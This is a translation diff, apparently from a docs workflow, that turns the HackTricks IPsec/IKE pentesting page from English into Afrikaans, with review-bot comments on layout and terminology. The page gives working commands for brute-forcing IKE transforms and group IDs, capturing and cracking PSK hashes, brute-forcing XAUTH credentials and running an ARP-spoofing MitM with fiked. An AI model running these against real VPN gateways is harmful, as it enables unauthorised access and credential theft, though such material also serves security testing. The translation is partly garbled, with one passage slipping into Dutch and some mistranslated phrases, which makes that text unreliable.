-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regmaak. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} *** -## Basic Information +## Basiese Inligting -**IPsec** is widely recognized as the principal technology for securing communications between networks (LAN-to-LAN) and from remote users to the network gateway (remote access), serving as the backbone for enterprise VPN solutions. +**IPsec** word algemeen erken as die belangrikste tegnologie vir die beveiliging van kommunikasie tussen netwerke (LAN-to-LAN) en vanaf afgeleë gebruikers na die netwerkgateway (afgeleë toegang), en dien as die ruggraat vir ondernemings-VPN-oplossings. -The establishment of a **security association (SA)** between two points is managed by **IKE**, which operates under the umbrella of ISAKMP, a protocol designed for the authentication and key exchange. This process unfolds in several phases: +Die vestiging van 'n **sekuriteitsvereniging (SA)** tussen twee punte word bestuur deur **IKE**, wat onder die beskerming van ISAKMP opereer, 'n protokol wat ontwerp is vir die outentifikasie en sleuteluitruiling. Hierdie proses ontvou in verskeie fases: -- **Phase 1:** A secure channel is created between two endpoints. 
This is achieved through the use of a Pre-Shared Key (PSK) or certificates, employing either main mode, which involves three pairs of messages, or **aggressive mode**. -- **Phase 1.5:** Though not mandatory, this phase, known as the Extended Authentication Phase, verifies the identity of the user attempting to connect by requiring a username and password. -- **Phase 2:** This phase is dedicated to negotiating the parameters for securing data with **ESP** and **AH**. It allows for the use of algorithms different from those in Phase 1 to ensure **Perfect Forward Secrecy (PFS)**, enhancing security. +- **Fase 1:** 'n Veilige kanaal word geskep tussen twee eindpunte. Dit word bereik deur die gebruik van 'n Pre-Shared Key (PSK) of sertifikate, deur óf hoofmodus, wat drie pare boodskappe betrek, óf **aggressiewe modus**. +- **Fase 1.5:** Alhoewel dit nie verpligtend is nie, verifieer hierdie fase, bekend as die Uitgebreide Outentifikasiefase, die identiteit van die gebruiker wat probeer koppel deur 'n gebruikersnaam en wagwoord te vereis. +- **Fase 2:** Hierdie fase is gewy aan die onderhandeling van die parameters vir die beveiliging van data met **ESP** en **AH**. Dit maak die gebruik van algoritmes moontlik wat verskil van dié in Fase 1 om **Perfect Forward Secrecy (PFS)** te verseker, wat die sekuriteit verbeter. -**Default port:** 500/udp - -## **Discover** the service using nmap +**Verstekpoort:** 500/udp +## **Ontdek** die diens met behulp van nmap ``` root@bt:~# nmap -sU -p 500 172.16.21.200 Starting Nmap 5.51 (http://nmap.org) at 2011-11-26 10:56 IST 
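Review bot: this hunk drops the blank lines between `**Verstekpoort:** 500/udp`, the `## **Ontdek** die diens met behulp van nmap` heading and the opening ``` fence (the `-` side shows the removed empty lines as `- `), which the workflow does before every fenced block in this patch; GitBook still renders it, but the Afrikaans files then diverge in layout from the English originals and every later sync produces noisy whitespace diffs. Keep the blank lines around fences. Also, the shared support footer is translated differently per file within this one patch: "Deel jou hacking-truuks deur PRs in te dien" here versus "Deel jou hacktruuks deur PR's in te dien" in the elasticsearch and cassandra files; translate the footer once and reuse it verbatim.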
@@ -46,149 +45,131 @@ PORT STATE SERVICE 500/udp open isakmp MAC Address: 00:1B:D5:54:4D:E4 (Cisco Systems) ``` +## **Om 'n geldige transformasie te vind** -## **Finding a valid transformation** +Die IPSec-konfigurasie kan slegs voorberei word om een of 'n paar transformasies te aanvaar. 'n Transformasie is 'n kombinasie van waardes. **Elke transformasie** bevat 'n aantal eienskappe soos DES of 3DES as die **enkripsie-algoritme**, SHA of MD5 as die **integriteitsalgoritme**, 'n vooraf gedeelde sleutel as die **outentiseringsmetode**, Diffie-Hellman 1 of 2 as die sleutel **verspreidingsalgoritme** en 28800 sekondes as die **lewensduur**. -The IPSec configuration can be prepared only to accept one or a few transformations. A transformation is a combination of values. **Each transform** contains a number of attributes like DES or 3DES as the **encryption algorithm**, SHA or MD5 as the **integrity algorithm**, a pre-shared key as the **authentication type**, Diffie-Hellman 1 or 2 as the key **distribution algorithm** and 28800 seconds as the **lifetime**. - -Then, the first thing that you have to do is to **find a valid transformation**, so the server will talk to you. To do so, you can use the tool **ike-scan**. By default, Ike-scan works in main mode, and sends a packet to the gateway with an ISAKMP header and a single proposal with **eight transforms inside it**. - -Depending on the response you can obtain some information about the endpoint: +Die eerste ding wat jy moet doen, is om 'n geldige transformasie te vind, sodat die bediener met jou sal praat. Jy kan die hulpmiddel **ike-scan** gebruik om dit te doen. Standaard werk Ike-scan in hoofmodus en stuur 'n pakkie na die hekgat met 'n ISAKMP-kop en 'n enkele voorstel met **agt transformasies daarin**. 
+Afhanklik van die respons kan jy inligting oor die eindpunt verkry: ``` root@bt:~# ike-scan -M 172.16.21.200 Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/) 172.16.21.200 Main Mode Handshake returned - HDR=(CKY-R=d90bf054d6b76401) - SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) - VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation) - +HDR=(CKY-R=d90bf054d6b76401) +SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) +VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation) + Ending ike-scan 1.9: 1 hosts scanned in 0.015 seconds (65.58 hosts/sec). 1 returned handshake; 0 returned notify ``` +Soos u in die vorige antwoord kan sien, is daar 'n veld genaamd **AUTH** met die waarde **PSK**. Dit beteken dat die VPN gekonfigureer is met 'n voorgeskrewe sleutel (en dit is regtig goed vir 'n pentester).\ +**Die waarde van die laaste lyn is ook baie belangrik:** -As you can see in the previous response, there is a field called **AUTH** with the value **PSK**. This means that the vpn is configured using a preshared key (and this is really good for a pentester).\ -**The value of the last line is also very important:** +* _0 teruggekeerde handdruk; 0 teruggekeerde kennisgewing:_ Dit beteken die teiken is **nie 'n IPsec-hekwerk** nie. +* _**1 teruggekeerde handdruk; 0 teruggekeerde kennisgewing:**_ Dit beteken die **teiken is gekonfigureer vir IPsec en is gewillig om IKE-onderhandeling uit te voer, en een of meer van die voorgestelde transformasies is aanvaarbaar** ( 'n geldige transformasie sal in die uitset vertoon word). +* _0 teruggekeerde handdruk; 1 teruggekeerde kennisgewing:_ VPN-hekwerke reageer met 'n kennisgewing wanneer **geen van die transformasies aanvaarbaar is** (hoewel sommige hekwerke dit nie doen nie, in welke geval verdere analise en 'n hersiene voorstel geprobeer moet word). 
-* _0 returned handshake; 0 returned notify:_ This means the target is **not an IPsec gateway**. -* _**1 returned handshake; 0 returned notify:**_ This means the **target is configured for IPsec and is willing to perform IKE negotiation, and either one or more of the transforms you proposed are acceptable** (a valid transform will be shown in the output). -* _0 returned handshake; 1 returned notify:_ VPN gateways respond with a notify message when **none of the transforms are acceptable** (though some gateways do not, in which case further analysis and a revised proposal should be tried). - -Then, in this case we already have a valid transformation but if you are in the 3rd case, then you need to **brute-force a little bit to find a valid transformation:** - -First of all you need to create all the possible transformations: +In hierdie geval het ons reeds 'n geldige transformasie, maar as u in die 3de geval is, moet u 'n bietjie **brute force** gebruik om 'n geldige transformasie te vind: +Eerstens moet u al die moontlike transformasies skep: ```bash for ENC in 1 2 3 4 5 6 7/128 7/192 7/256 8; do for HASH in 1 2 3 4 5 6; do for AUTH in 1 2 3 4 5 6 7 8 64221 64222 64223 64224 65001 65002 65003 65004 65005 65006 65007 65008 65009 65010; do for GROUP in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18; do echo "--trans=$ENC,$HASH,$AUTH,$GROUP" >> ike-dict.txt ;done ;done ;done ;done ``` - -And then brute-force each one using ike-scan (this can take several minutes): - +En dan kragtige krag elkeen met behulp van ike-scan (dit kan verskeie minute neem): ```bash while read line; do (echo "Valid trans found: $line" && sudo ike-scan -M $line ) | grep -B14 "1 returned handshake" | grep "Valid trans found" ; done < ike-dict.txt ``` - -If the brute-force didn't work, maybe the server is responding without handshakes even to valid transforms. 
Then, you could try the same brute-force but using aggressive mode: - +As die brute-force nie werk nie, is dit moontlik dat die bediener selfs sonder handskommunikasie reageer op geldige transformasies. Jy kan dan dieselfde brute-force probeer, maar in aggressiewe modus: ```bash while read line; do (echo "Valid trans found: $line" && ike-scan -M --aggressive -P handshake.txt $line ) | grep -B7 "SA=" | grep "Valid trans found" ; done < ike-dict.txt ``` - -Hopefully **a valid transformation is echoed back**.\ -You can try the **same attack** using [**iker.py**](https://github.com/isaudits/scripts/blob/master/iker.py).\ -You could also try to brute force transformations with [**ikeforce**](https://github.com/SpiderLabs/ikeforce): - +Hopelik word **'n geldige transformasie teruggestuur'**.\ +Jy kan die **selfde aanval** probeer met behulp van [**iker.py**](https://github.com/isaudits/scripts/blob/master/iker.py).\ +Jy kan ook probeer om transformasies met **ikeforce** te kragtig te breek met [**ikeforce**](https://github.com/SpiderLabs/ikeforce): ```bash ./ikeforce.py # No parameters are required for scan -h for additional help ``` - ![](<../.gitbook/assets/image (109).png>) -In **DH Group: 14 = 2048-bit MODP** and **15 = 3072-bit**\ -**2 = HMAC-SHA = SHA1 (in this case). The `--trans` format is $Enc,$Hash,$Auth,$DH** +In **DH Groep: 14 = 2048-bit MODP** en **15 = 3072-bit**\ +**2 = HMAC-SHA = SHA1 (in hierdie geval). Die `--trans` formaat is $Enc,$Hash,$Auth,$DH** -Cisco indicates to avoid using DH groups 1 and 2 because they're not strong enough. Experts believe that **countries with a lot of resources can easily break the encryption** of data that uses these weak groups. This is done by using a special method that prepares them to crack the codes quickly. Even though it costs a lot of money to set up this method, it allows these powerful countries to read the encrypted data in real time if it's using a group that's not strong (like 1,024-bit or smaller). 
+Cisco dui aan dat dit beter is om nie DH groepe 1 en 2 te gebruik nie omdat hulle nie sterk genoeg is nie. Kenners glo dat **lande met baie hulpbronne maklik die versleuteling** van data wat hierdie swak groepe gebruik, kan breek. Dit word gedoen deur 'n spesiale metode te gebruik wat hulle voorberei om die kodes vinnig te kraak. Alhoewel dit baie geld kos om hierdie metode op te stel, stel dit hierdie magtige lande in staat om die versleutelde data in werklike tyd te lees as dit 'n groep gebruik wat nie sterk is nie (soos 1,024-bit of kleiner). -### Server fingerprinting +### Server vingerafdruk -Then, you can use ike-scan to try to **discover the vendor** of the device. The tool send an initial proposal and stops replaying. Then, it will **analyze** the **time** difference **between** the received **messages** from the server and the matching response pattern, the pentester can successfully fingerprint the VPN gateway vendor. More over, some VPN servers will use the optional **Vendor ID (VID) payload** with IKE. +Daarna kan jy ike-scan gebruik om te probeer **ontdek wie die vervaardiger** van die toestel is. Die instrument stuur 'n aanvanklike voorstel en stop om te herhaal. Dan sal dit die **tydverskil analiseer** tussen die ontvangste boodskappe van die bediener en die ooreenstemmende responspatroon, sodat die pentester die VPN-hekwerkvervaardiger suksesvol kan identifiseer. Verder sal sommige VPN-bedieners die opsionele **Vendor ID (VID) payload** met IKE gebruik. 
-**Specify the valid transformation if needed** (using --trans) - -If IKE discover which is the vendor it will print it: +**Spesifiseer die geldige transformasie indien nodig** (deur --trans te gebruik) +As IKE uitvind wie die vervaardiger is, sal dit dit druk: ``` root@bt:~# ike-scan -M --showbackoff 172.16.21.200 Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/) 172.16.21.200 Main Mode Handshake returned - HDR=(CKY-R=4f3ec84731e2214a) - SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) - VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation) - +HDR=(CKY-R=4f3ec84731e2214a) +SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) +VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation) + IKE Backoff Patterns: - + IP Address No. Recv time Delta Time 172.16.21.200 1 1322286031.744904 0.000000 172.16.21.200 2 1322286039.745081 8.000177 172.16.21.200 3 1322286047.745989 8.000908 172.16.21.200 4 1322286055.746972 8.000983 172.16.21.200 Implementation guess: Cisco VPN Concentrator - + Ending ike-scan 1.9: 1 hosts scanned in 84.080 seconds (0.01 hosts/sec). 1 returned handshake; 0 returned notify ``` +Dit kan ook bereik word met die nmap-skripsie _**ike-version**_ -This can be also achieve with nmap script _**ike-version**_ +## Die regte ID (groepnaam) vind -## Finding the correct ID (group name) +Om toestemming te hê om die has te kan vasvang, het jy 'n geldige transformasie nodig wat Aggressiewe modus ondersteun en die regte ID (groepnaam). Jy sal waarskynlik nie die geldige groepnaam weet nie, so jy sal dit moet kragtig afdwing.\ +Om dit te doen, sal ek jou 2 metodes aanbeveel: -For being allowed to capture the hash you need a valid transformation supporting Aggressive mode and the correct ID (group name). 
You probably won't know the valid group name, so you will have to brute-force it.\ -To do so, I would recommend you 2 methods: - -### Bruteforcing ID with ike-scan - -First of all try to make a request with a fake ID trying to gather the hash ("-P"): +### ID kragtig afdwing met ike-scan +Eerstens, probeer 'n versoek maak met 'n vals ID om die has te probeer vasvang ("-P"): ```bash ike-scan -P -M -A -n fakeID ``` - -If **no hash is returned**, then probably this method of brute forcing will work. **If some hash is returned, this means that a fake hash is going to be sent back for a fake ID, so this method won't be reliable** to brute-force the ID. For example, a fake hash could be returned (this happens in modern versions): +As **geen has teruggekeer word nie**, sal hierdie metode van brute forcing waarskynlik werk. **As 'n sekere has teruggekeer word, beteken dit dat 'n vals has teruggestuur gaan word vir 'n vals ID, so hierdie metode sal nie betroubaar wees** om die ID te brute-force nie. Byvoorbeeld, 'n vals has kan teruggestuur word (dit gebeur in moderne weergawes): ![](<../.gitbook/assets/image (110).png>) -But if as I have said, no hash is returned, then you should try to brute-force common group names using ike-scan. +Maar as soos ek gesê het, geen has teruggekeer word nie, moet jy probeer om algemene groepname te brute-force met behulp van ike-scan. -This script **will try to brute-force possible IDs** and will return the IDs where a valid handshake is returned (this will be a valid group name). +Hierdie skrip **sal probeer om moontlike IDs te brute-force** en sal die IDs teruggee waar 'n geldige handshake teruggekeer word (dit sal 'n geldige groepnaam wees). -If you have discovered an specific transformation add it in the ike-scan command. And if you have discovered several transformations feel free to add a new loop to try them all (you should try them all until one of them is working properly). 
- -You can use the[ dictionary of ikeforce](https://github.com/SpiderLabs/ikeforce/blob/master/wordlists/groupnames.dic) or [the one in seclists](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/ike-groupid.txt) of common group names to brute-force them: +As jy 'n spesifieke transformasie ontdek het, voeg dit by die ike-scan bevel. En as jy verskeie transformasies ontdek het, voel vry om 'n nuwe lus by te voeg om almal te probeer (jy moet almal probeer totdat een van hulle behoorlik werk). +Jy kan die [woordeboek van ikeforce](https://github.com/SpiderLabs/ikeforce/blob/master/wordlists/groupnames.dic) of [die een in seclists](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/ike-groupid.txt) van algemene groepname gebruik om hulle te brute-force: ```bash while read line; do (echo "Found ID: $line" && sudo ike-scan -M -A -n $line ) | grep -B14 "1 returned handshake" | grep "Found ID:"; done < /usr/share/wordlists/external/SecLists/Miscellaneous/ike-groupid.txt ``` - -Or use this dict (is a combination of the other 2 dicts without repetitions): +Of gebruik hierdie woordeboek (dit is 'n kombinasie van die ander 2 woordeboeke sonder herhalings): {% file src="../.gitbook/assets/vpnIDs.txt" %} -### Bruteforcing ID with Iker +### Bruteforce ID met Iker -[**iker.py**](https://github.com/isaudits/scripts/blob/master/iker.py) also uses **ike-scan** to bruteforce possible group names. It follows it's own method to **find a valid ID based on the output of ike-scan**. +[**iker.py**](https://github.com/isaudits/scripts/blob/master/iker.py) gebruik ook **ike-scan** om moontlike groepname te bruteforce. Dit volg sy eie metode om 'n geldige ID te vind gebaseer op die uitset van ike-scan. -### Bruteforcing ID with ikeforce +### Bruteforce ID met ikeforce -[**ikeforce.py**](https://github.com/SpiderLabs/ikeforce) is a tool that can be used to **brute force IDs also**. 
This tool will **try to exploit different vulnerabilities** that could be used to **distinguish between a valid and a non-valid ID** (could have false positives and false negatives, that is why I prefer to use the ike-scan method if possible). +[**ikeforce.py**](https://github.com/SpiderLabs/ikeforce) is 'n instrument wat gebruik kan word om IDs ook te bruteforce. Hierdie instrument sal probeer om verskillende kwesbaarhede uit te buit wat gebruik kan word om tussen 'n geldige en 'n nie-geldige ID te onderskei (dit kan vals positiewe en vals negatiewe hê, daarom verkies ek om die ike-scan metode te gebruik as dit moontlik is). -By default **ikeforce** will send at the beginning some random ids to check the behaviour of the server and determinate the tactic to use. +Standaard sal **ikeforce** aan die begin 'n paar lukrake IDs stuur om die gedrag van die bediener te toets en die taktiek te bepaal. -* The **first method** is to brute-force the group names by **searching** for the information **Dead Peer Detection DPD** of Cisco systems (this info is only replayed by the server if the group name is correct). -* The **second method** available is to **checks the number of responses sent to each try** because sometimes more packets are sent when the correct id is used. -* The **third method** consist on **searching for "INVALID-ID-INFORMATION" in response to incorrect ID**. -* Finally, if the server does not replay anything to the checks, **ikeforce** will try to brute force the server and check if when the correct id is sent the server replay with some packet.\ - Obviously, the goal of brute forcing the id is to get the **PSK** when you have a valid id. Then, with the **id** and **PSK** you will have to bruteforce the XAUTH (if it is enabled). - -If you have discovered an specific transformation add it in the ikeforce command. 
And if you have discovered several transformations feel free to add a new loop to try them all (you should try them all until one of them is working properly). +* Die **eerste metode** is om die groepname te bruteforce deur te soek na die inligting **Dead Peer Detection DPD** van Cisco-stelsels (hierdie inligting word slegs deur die bediener herhaal as die groepnaam korrek is). +* Die **tweede metode** wat beskikbaar is, is om die aantal antwoorde wat na elke poging gestuur word, te **kontroleer**, omdat soms meer pakkies gestuur word wanneer die korrekte ID gebruik word. +* Die **derde metode** behels die soeke na "INVALID-ID-INFORMATION" as antwoord op 'n ongeldige ID. +* As die bediener natuurlik niks antwoord op die toetse nie, sal **ikeforce** probeer om die bediener te bruteforce en te kyk of die bediener antwoord met 'n paar pakkies wanneer die korrekte ID gestuur word.\ +Die doel van die bruteforce van die ID is natuurlik om die **PSK** te kry as jy 'n geldige ID het. Dan sal jy met die **ID** en **PSK** die XAUTH moet bruteforce (as dit geaktiveer is). +As jy 'n spesifieke transformasie ontdek het, voeg dit by die ikeforce-opdrag. En as jy verskeie transformasies ontdek het, voel vry om 'n nuwe lus by te voeg om almal te probeer (jy moet almal probeer totdat een van hulle behoorlik werk). ```bash git clone https://github.com/SpiderLabs/ikeforce.git pip install 'pyopenssl==17.2.0' #It is old and need this version of the library 
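Review bot: the sentence "To do so, I would recommend you 2 methods:" is deleted in this hunk without an Afrikaans replacement, so the unchanged context line that still ends with a hard line break (`\`) now runs straight into the `### ID kragtig afdwing met ike-scan` heading; add the translated sentence back (or drop the trailing backslash). Two more points in the same hunk: the continuation of the fourth ikeforce bullet was indented under the bullet in the source (` Obviously, the goal of brute forcing ...`) but the added line `+Die doel van die bruteforce van die ID ...` is flush left, so it will render outside the list; and "Finally, if the server does not replay anything" becomes "As die bediener natuurlik niks antwoord op die toetse nie" ("natuurlik" reads as "naturally", not "finally"). Terminology is also inconsistent: "Bruteforcing ID" becomes "ID kragtig afdwing" for the ike-scan heading but "Bruteforce ID" for the Iker and ikeforce headings, and "hash" is rendered as "has" here but left as "hash" in the next hunk; pick one form for each.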
@@ -197,64 +178,54 @@ pip install 'pyopenssl==17.2.0' #It is old and need this version of the library ```bash ./ikeforce.py -e -w ./wordlists/groupnames.dic ``` +### Snuffel ID -### Sniffing ID - -(From the book **Network Security Assessment: Know Your Network**): It is also possible to obtain valid usernames by sniffing the connection between the VPN client and server, as the first aggressive mode packet containing the client ID is sent in the clear +(Uit die boek **Netwerk Sekuriteitsassessering: Ken Jou Netwerk**): Dit is ook moontlik om geldige gebruikersname te verkry deur die snuffel van die verbinding tussen die VPN-kliënt en bediener, aangesien die eerste aggressiewe modus-pakket wat die kliënt-ID bevat, in die oop gestuur word. ![](<../.gitbook/assets/image (111).png>) -## Capturing & cracking the hash - -Finally, If you have found a **valid transformation** and the **group name** and if the **aggressive mode is allowed**, then you can very easily grab the crackable hash: +## Vaslegging en kraak van die has +Uiteindelik, as jy 'n **geldige transformasie** en die **groepnaam** gevind het en as die **aggressiewe modus toegelaat word**, kan jy baie maklik die kraakbare has gryp: ```bash ike-scan -M -A -n --pskcrack=hash.txt #If aggressive mode is supported and you know the id, you can get the hash of the passwor ``` +Die hash sal binne _hash.txt_ gestoor word. -The hash will be saved inside _hash.txt_. - -You can use **psk-crack**, **john** (using [**ikescan2john.py**](https://github.com/truongkma/ctf-tools/blob/master/John/run/ikescan2john.py)) and **hashcat** to **crack** the hash: - +Jy kan **psk-crack**, **john** (deur gebruik te maak van [**ikescan2john.py**](https://github.com/truongkma/ctf-tools/blob/master/John/run/ikescan2john.py)) en **hashcat** gebruik om die hash te **kraak**: ```bash psk-crack -d psk.txt ``` - ## **XAuth** -**Aggressive mode IKE** combined with a **Pre-Shared Key (PSK)** is commonly employed for **group authentication** purposes. 
This method is augmented by **XAuth (Extended Authentication)**, which serves to introduce an additional layer of **user authentication**. Such authentication typically leverages services like **Microsoft Active Directory**, **RADIUS**, or comparable systems. +**Aggressiewe modus IKE** saam met 'n **Pre-Shared Key (PSK)** word algemeen gebruik vir **groepverifikasie** doeleindes. Hierdie metode word versterk deur **XAuth (Uitgebreide Verifikasie)**, wat 'n addisionele laag van **gebruikersverifikasie** inbring. Sulke verifikasie maak gewoonlik gebruik van dienste soos **Microsoft Active Directory**, **RADIUS**, of vergelykbare stelsels. -Transitioning to **IKEv2**, a notable shift is observed where **EAP (Extensible Authentication Protocol)** is utilized in lieu of **XAuth** for the purpose of authenticating users. This change underscores an evolution in authentication practices within secure communication protocols. +By die oorgang na **IKEv2**, word 'n merkbare verskuiwing waargeneem waar **EAP (Uitbreibare Verifikasieprotokol)** gebruik word in plaas van **XAuth** om gebruikers te verifieer. Hierdie verandering beklemtoon 'n evolusie in verifikasiepraktyke binne veilige kommunikasieprotokolle. -### Local network MitM to capture credentials - -So you can capture the data of the login using _fiked_ and see if there is any default username (You need to redirect IKE traffic to `fiked` for sniffing, which can be done with the help of ARP spoofing, [more info](https://opensourceforu.com/2012/01/ipsec-vpn-penetration-testing-backtrack-tools/)). 
Fiked will act as a VPN endpoint and will capture the XAuth credentials: +### Plaaslike netwerk MitM om geloofsbriewe vas te vang +Sodat jy die data van die aanmelding kan vasvang, kan jy _fiked_ gebruik en sien of daar enige verstek gebruikersnaam is (Jy moet IKE-verkeer na `fiked` omskakel vir snuffelwerk, wat gedoen kan word met behulp van ARP-spoofing, [meer inligting](https://opensourceforu.com/2012/01/ipsec-vpn-penetration-testing-backtrack-tools/)). Fiked sal optree as 'n VPN-eindpunt en sal die XAuth-geloofsbriewe vasvang: ```bash fiked -g -k testgroup:secretkey -l output.txt -d ``` +Verder, probeer om met behulp van IPSec een MitM-aanval uit te voeren en alle verkeer naar poort 500 te blokkeer. Als de IPSec-tunnel niet kan worden opgezet, wordt het verkeer mogelijk in heldere tekst verzonden. -Also, using IPSec try to make a MitM attack and block all traffic to port 500, if the IPSec tunnel cannot be established maybe the traffic will be sent in clear. - -### Brute-forcing XAUTH username ad password with ikeforce - -To brute force the **XAUTH** (when you know a valid group name **id** and the **psk**) you can use a username or list of usernames and a list o passwords: +### Brute-forcing XAUTH-gebruikersnaam en wachtwoord met ikeforce +Om de **XAUTH** (wanneer je een geldige groepsnaam **id** en de **psk** weet) te brute forcen, kun je een gebruikersnaam of lijst van gebruikersnamen en een lijst met wachtwoorden gebruiken: ```bash ./ikeforce.py -b -i -u -k -w [-s 1] ``` +Op hierdie manier sal ikeforce probeer om te verbind deur elke kombinasie van gebruikersnaam:wagwoord te gebruik. -This way, ikeforce will try to connect using each combination of username:password. +As jy een of verskeie geldige transformasies gevind het, gebruik hulle dan soos in die vorige stappe. -If you found one or several valid transforms just use them like in the previous steps. 
+## Verifikasie met 'n IPSEC VPN -## Authentication with an IPSEC VPN - -In Kali, **VPNC** is utilized to establish IPsec tunnels. The **profiles** must be located in the directory `/etc/vpnc/`. You can initiate these profiles using the command _**vpnc**_. - -The following commands and configurations illustrate the process of setting up a VPN connection with VPNC: +In Kali word **VPNC** gebruik om IPsec-tunnels te vestig. Die **profiele** moet in die gids `/etc/vpnc/` geleë wees. Jy kan hierdie profiele inisieer deur die opdrag _**vpnc**_ te gebruik. +Die volgende opdragte en konfigurasies illustreer die proses om 'n VPN-verbinding met VPNC op te stel: ```bash root@system:~# cat > /etc/vpnc/samplevpn.conf << STOP IPSec gateway [VPN_GATEWAY_IP] 
@@ -268,22 +239,21 @@ root@system:~# vpnc samplevpn VPNC started in background (pid: [PID])... root@system:~# ifconfig tun0 ``` +In hierdie opstelling: -In this setup: +- Vervang `[VPN_GATEWAY_IP]` met die werklike IP-adres van die VPN-poort. +- Vervang `[VPN_CONNECTION_ID]` met die identifiseerder vir die VPN-verbinding. +- Vervang `[VPN_GROUP_SECRET]` met die VPN se groepgeheim. +- Vervang `[VPN_USERNAME]` en `[VPN_PASSWORD]` met die VPN-verifikasie-inligting. +- `[PID]` simboliseer die proses-ID wat toegewys sal word wanneer `vpnc` geïnisieer word. -- Replace `[VPN_GATEWAY_IP]` with the actual IP address of the VPN gateway. -- Replace `[VPN_CONNECTION_ID]` with the identifier for the VPN connection. -- Replace `[VPN_GROUP_SECRET]` with the VPN's group secret. -- Replace `[VPN_USERNAME]` and `[VPN_PASSWORD]` with the VPN authentication credentials. -- `[PID]` symbolizes the process ID that will be assigned when `vpnc` initiates. +Maak seker dat werklike, veilige waardes gebruik word om die plasehouers te vervang wanneer die VPN gekonfigureer word. -Ensure that actual, secure values are used to replace the placeholders when configuring the VPN. +## Verwysingsmateriaal -## Reference Material - -* [PSK cracking paper](http://www.ernw.de/download/pskattack.pdf) +* [PSK-kraakpapier](http://www.ernw.de/download/pskattack.pdf) * [SecurityFocus Infocus](http://www.securityfocus.com/infocus/1821) -* [Scanning a VPN Implementation](http://www.radarhack.com/dir/papers/Scanning\_ike\_with\_ikescan.pdf) +* [Skandering van 'n VPN-implementering](http://www.radarhack.com/dir/papers/Scanning\_ike\_with\_ikescan.pdf) * Network Security Assessment 3rd Edition ## Shodan @@ -292,20 +262,20 @@ Ensure that actual, secure values are used to replace the placeholders when conf
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regstel. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
